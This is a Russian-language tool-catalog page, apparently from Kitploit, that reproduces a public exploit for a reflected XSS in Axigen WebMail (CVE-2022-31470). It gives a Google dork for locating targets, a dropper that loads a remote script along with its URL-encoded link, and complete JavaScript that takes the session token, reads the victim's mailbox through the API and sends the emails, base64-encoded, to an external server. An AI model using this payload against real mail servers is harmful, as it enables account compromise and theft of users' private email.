Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-08-21-exploit — Axigen < 10.3.3.47, 10.2.3.12 - Отраженный XSS | Kitploit
Инструменты/GitHubGitHub/amirzargham/cve-2023-08-21-exploit
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информации
GitHubamirzargham/cve-2023-08-21-exploit

CVE-2023-08-21-exploit

Axigen < 10.3.3.47, 10.2.3.12 - Отраженный XSS

Репозиторий
132 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название эксплойта: Axigen < 10.3.3.47, 10.2.3.12 - Отражённый XSS

Google Dork: inurl:passwordexpired=yes

Дата: 2023-08-21

Автор эксплойта: AmirZargham

Сайт вендора: https://www.axigen.com/

Ссылка на ПО: https://www.axigen.com/mail-server/download/

Версия: (10.5.0–4370c946) и более старые версии Axigen WebMail

Протестировано на: firefox, chrome

CVE: CVE-2022-31470

Эксплойт Мы используем второй отражённый XSS для эксплуатации этой уязвимости, создаём вредоносную ссылку и крадём электронные письма пользователей.

Код дроппера Этот код дроппера загружает и выполняет JavaScript-код эксплойта с удалённого сервера.

root@kitploit:~
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//

Кодированная форма /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//

Код эксплойта

root@kitploit:~
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();

Объединение дроппера и эксплойта Вы можете разместить код эксплойта где-нибудь и затем указать его в коде дроппера.

Опубликовано в: exploit-db.

Опубликовано в: 0day.today.

Опубликовано в: packet storm.

Скачать инструмент